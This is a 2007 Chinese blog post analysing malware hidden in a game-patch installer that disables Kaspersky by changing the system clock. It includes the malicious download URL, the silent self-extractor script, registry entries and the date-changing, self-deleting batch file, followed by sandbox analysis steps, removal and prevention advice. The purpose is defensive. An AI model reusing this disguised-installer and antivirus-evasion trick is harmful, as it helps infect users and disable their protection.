关于改时间杀掉卡巴或者过卡巴的病毒分析

生活 CN-P5 1419℃ 0评论

关于改时间杀掉卡巴或者过卡巴的病毒分析

  最近网上在流传能通过更改系统时间来突破卡巴斯基(经实验还能绕过瑞星防火墙下载版)的病毒(有兴趣的可以找《电脑爱好者》杂志2007年08期P52看下)。病毒可以在几秒的时间内让卡巴斯基的防御瘫痪,并且还能在杀掉卡巴斯基后从后台到网上下载木马后门。卡巴斯基拥有众多的用户,中毒后危害性肯定很厉害。卡巴一直是我喜欢的杀毒软件,很不幸我在网上下载游戏补丁时也中招了。下面让我们分析下这个“巨”厉害的病毒。主要目的是我们以后可以尝试自己分析病毒。(*^__^*) 嘻嘻……

1,病毒主体文件

这是我在网上下载文件的记录(是个游戏补丁)

文件名称       setup65678.exe
文件大小       4.31MB
存放位置       C:Documents and Settingsmengfandong.MFD-200桌面
文件类型       exe
完成进度       100%
下载链接       http://demn19.vicp.net/setup65678.exe
引用页         
注释          
下载用时       00:00:12
平均速度       358.30KB/秒
P2P资源     0
创建任务时间     2007-04-24 04:32:08
完成任务时间     2007-04-24 04:32:23
下载后是个ZIP格式的自解压文件如图

   如果你双击解压的话不用想你肯定中毒了,因为它的“注释”里写了自解压脚本命令执行病毒文件我们有winrar从右键选择打开(注意:不是解压)看一下注释:

;下面的注释包含自解压脚本命令

Setup=dmap_00300000234.exe
Presetup=1013.exe
Silent=1

这里面的2个文件分别是dmap_00300000234.exe(我要地图2007桌面版)和1013.exe(病毒主体)。

Presetup=1013.exe的意思就是解压完后执行病毒。

silent=1是静默安装,在后台安装用后看不见。

Setup=dmap_00300000234.exe是安装《我要地图》用来迷惑用户的。

2,分析病毒

先让我们打造个虚拟环境,就是所谓的“蜜罐”。推荐在虚拟机上执行。先打开“影子系统”选择“启动完全影子模式”点“启动”等待几秒后弹出启动成功的提示框。

我们用卡巴检测一下病毒:

再打开系统快照和对比工具“regsnap”用来分析病毒对系统的更改。

现在用“regsnap”生成“完全”系统快照。并保存为“病毒前.rgs”

然后运行解压的1013.exe。

大约3秒后卡巴的任务栏图标变成灰色,主动防御停止。并弹出提示框:

瑞星防火墙任务栏图标也变灰,弹出提示框:桌面上的病毒文件不见了。我们可以看一下系统时间变成2004/4/27了(年份和现在不同,月份和日期相同)。至此系统没有其他动作,可见病毒已经运行完毕了。然后立即断网。可能会弹出”脱机浏览“的提示框那就是病毒从网上下载病毒或木马呢。我们先把时间改回现在时间。再用“regsnap”生成运行过病毒后的“完全”系统快照。并保存为“病毒后.rgs”。然后对比前后2个快照。我们看到病毒在系统的windossystem32文件夹释放了2个文件95AA6D72.exe和FB82CDE6.EXE(2个文件名称都为随机8位的数字和大写字母,具体在你的机子上是什么文件名可以“ctrl+alt+del”调出“任务管理器”找到可疑的8位的数字和大写字母开头的进程就是第1个文件,再到windossystem32找到和1013.exe图标一样,所占容量一样的文件就是第2个。)通过快照我们看见病毒在注册表更改和添加了21处共10个键:[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_FB82CDE6]
"NextInstance"=dword:00000001[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_FB82CDE6000]
"Service"="FB82CDE6"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="FB82CDE6"[HKEY_LOCAL_MACHINESYSTEMControlSet004ServicesFB82CDE6]
"Type"=dword:00000010
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"="C:windowssystem32FB82CDE6.EXE -service"
"DisplayName"="FB82CDE6"
"ObjectName"="LocalSystem"
"Description"="FB82CDE6"[HKEY_LOCAL_MACHINESYSTEMControlSet004ServicesFB82CDE6Security]
"Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,
   00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,
   00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,
   05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,
   20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,
   00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,
   00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00
[HKEY_LOCAL_MACHINESYSTEMControlSet004EnumRootLEGACY_FB82CDE6]
"NextInstance"=dword:00000001[HKEY_LOCAL_MACHINESYSTEMControlSet004EnumRootLEGACY_FB82CDE6000]
"Service"="FB82CDE6"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="FB82CDE6"
[HKEY_LOCAL_MACHINESYSTEMControlSet003EnumRootLEGACY_FB82CDE6]
"NextInstance"=dword:00000001[HKEY_LOCAL_MACHINESYSTEMControlSet003EnumRootLEGACY_FB82CDE6000]
"Service"="FB82CDE6"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="FB82CDE6"
[HKEY_USERSS-1-5-18SYSTEMCurrentControlSetServicesFB82CDE6]
"Description"="FB82CDE6"
"DisplayName"="FB82CDE6"
"ImagePath"="C:windowssystem32FB82CDE6.EXE -service"
"ObjectName"="LocalSystem"
[HKEY_USERSS-1-5-21-1275210071-527237240-839522115-1003SYSTEMCurrentControlSetServicesFB82CDE6]
"Description"="FB82CDE6"
"DisplayName"="FB82CDE6"
"ImagePath"="C:windowssystem32FB82CDE6.EXE -service"
"ObjectName"="LocalSystem"
[HKEY_USERS.DEFAULTSYSTEMCurrentControlSetServicesFB82CDE6]
"Description"="FB82CDE6"
"DisplayName"="FB82CDE6"
"ImagePath"="C:windowssystem32FB82CDE6.EXE -service"
"ObjectName&q
uot;="LocalSystem"
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_FB82CDE6000]
"Service"="FB82CDE6"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="FB82CDE6"
[HKEY_LOCAL_MACHINESYSTEMControlSet004EnumRootLEGACY_FB82CDE6000]
"Service"="FB82CDE6"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="FB82CDE6"[HKEY_LOCAL_MACHINESYSTEMControlSet003EnumRootLEGACY_FB82CDE6000]
"Service"="FB82CDE6"
"Legacy"=dword:00000001
"ConfigFlags"=dword:00000000
"Class"="LegacyDriver"
"ClassGUID"="{8ECC055D-047F-11D1-A537-0000F8753ED1}"
"DeviceDesc"="FB82CDE6"添加了一个服务“FB82CDE6/FB82CDE6”,用来实现病毒开机自启动。有了这些“证据”我们就可以除掉这个病毒了。3,杀毒由于我们在影子系统中,所以这时退出影子系统就可以把病毒的改动等全部还原了。但是有的朋友可能已经中毒了,所以我们接着来说怎么在正常系统里杀毒。先在任务管理器里结束病毒进程。删掉windossystem32里的2个病毒文件。然后在删除服务里面的“FB82CDE6/FB82CDE6”服务,同时删除多出来的开机启动项,推荐用“SREng”。然后一个一个的删除注册表项和值,有的可能删除不掉,可以用冰刃“IceSword”来删除。千万不要删错了。然后用“优化大师”扫描注册表把扫描的注册表项全部删除。重启,然后在用“SREng”找“FB82CDE6/FB82CDE6”服务,如果没有了那就是杀毒完成了,如果还有就是没有完成杀毒(病毒变种的发展很快,我的机子并不一定能用在你的机子上,我说的是一个方法,让我们小菜见了病毒不亚害怕。)。用杀毒软件扫描,杀毒。为了不留下痕迹,再用优化大师扫描注册表。至此,病毒就这样被我们干掉了。顺便说一下它的工作机制和预防办法:4,发作机制(以下参考《电脑爱好者》07年08期P52)病毒先检查机子上有没有安装卡巴斯基(包括kav和kis)。如果有就执行病毒代码。如果没有就释放一个如下批处理文件(.bat)@echo offset date=%date%date 2004-04-17            (此处可能时间不同)ping -n 45 localhost > nuldate %date%del %05,预防:点击“开始”→“运行”→“gpedit.msc”→打开组策略在组策略管理器中选择“计算机配置→windos设置→安全设置→本地策略→用户权利指派→更改系统时间”双击打开“更改系统时间”属性对话框把里面的用户名全部删除。不过有点复杂,本人推荐小菜们到“360安全论坛”下载“360系统时间防改工具”。点“安装时间防改保护”可以禁止更改时间。如果想改动时间可以再运行,点击“允许时间修改”。

转载请注明:黑白的自留地 » 关于改时间杀掉卡巴或者过卡巴的病毒分析

喜欢 (0)
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
(1)个小伙伴在吐槽
  1. 全是电脑的应用知识哦,以后碰到难题了,就来你这查查呵呵
    苹果_baby2007-04-26 11:24 回复